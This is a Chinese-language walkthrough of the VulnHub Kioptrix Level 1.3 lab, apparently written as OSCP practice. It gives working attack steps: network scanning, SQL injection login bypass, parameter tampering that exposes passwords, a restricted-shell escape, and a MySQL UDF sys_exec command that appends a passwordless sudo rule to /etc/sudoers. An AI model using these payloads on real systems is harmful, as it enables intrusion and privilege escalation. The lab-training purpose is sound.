oscp——Kioptrix: Level 1.3 (#4)

0x00 目标资料 36

链接

https://www.vulnhub.com/entry/kioptrix-level-13-4,25/

难度推荐 4

  • 思路 1
  • 端口 0.5
  • web——usershell 1
  • usershell——rootshell 1.5

环境搭建

  • VMware

下载下来之后是一个vmdx的文件,所以要经过处理

这里新建一个虚拟机,选择其他

oscp——Kioptrix: Level 1.3 (#4)_第1张图片

移除原来的硬盘

oscp——Kioptrix: Level 1.3 (#4)_第2张图片

加载下载好的硬盘

oscp——Kioptrix: Level 1.3 (#4)_第3张图片

然后开机即可,这里需要注意的是,内存分配也要进行修改

oscp——Kioptrix: Level 1.3 (#4)_第4张图片

0x01 信息收集

ip

masscan 192.168.25.1/24 --ping --rate 1000000000000000000000000000000

oscp——Kioptrix: Level 1.3 (#4)_第5张图片

端口

nmap -A 192.168.25.213

oscp——Kioptrix: Level 1.3 (#4)_第6张图片

0x02 samba

目标开启了1349和445,samba可以通过enum4linux进行扫描一下

enum4linux -a -o 目标

oscp——Kioptrix: Level 1.3 (#4)_第7张图片

这里看到有以下用户

loneferret
robert
john

0x03 web——usershell

这里访问一下目标的站点,可以看到的是一个登录框

oscp——Kioptrix: Level 1.3 (#4)_第8张图片

登录框一般猜解弱口令猜解,或者测试是否存在注入

这里先测试一下万能密码,可以看到进入到下图页面

admin
' or '1'='1

oscp——Kioptrix: Level 1.3 (#4)_第9张图片

这里看到返回一个url

http://192.168.25.213/member.php?username=admin

这里对url里的username进行修改,修改为john时,可以看到显示了一个密码(测试发现,不论是robert还是john都会返回如下结果)

Username 	: 	john
Password 	: 	MyNameIsJohn

oscp——Kioptrix: Level 1.3 (#4)_第10张图片

这里使用获取到的账号密码进行ssh连接

oscp——Kioptrix: Level 1.3 (#4)_第11张图片

这里连接之后发现问题,很多命令都无法进行执行

20200224182858.png

使用如下命令获取tty

echo os.system('/bin/bash')

20200224182940.png

0x04 usershell——rootshell

这里我们在/var/www/目录下的checklogin.php文件里发现了mysql的账号和密码

oscp——Kioptrix: Level 1.3 (#4)_第12张图片

进行连接

 mysql -u root -p

oscp——Kioptrix: Level 1.3 (#4)_第13张图片

这里使用udf进行提权

select sys_exec('echo "john ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers');

oscp——Kioptrix: Level 1.3 (#4)_第14张图片

拿到flag

oscp——Kioptrix: Level 1.3 (#4)_第15张图片

你可能感兴趣的:(oscp)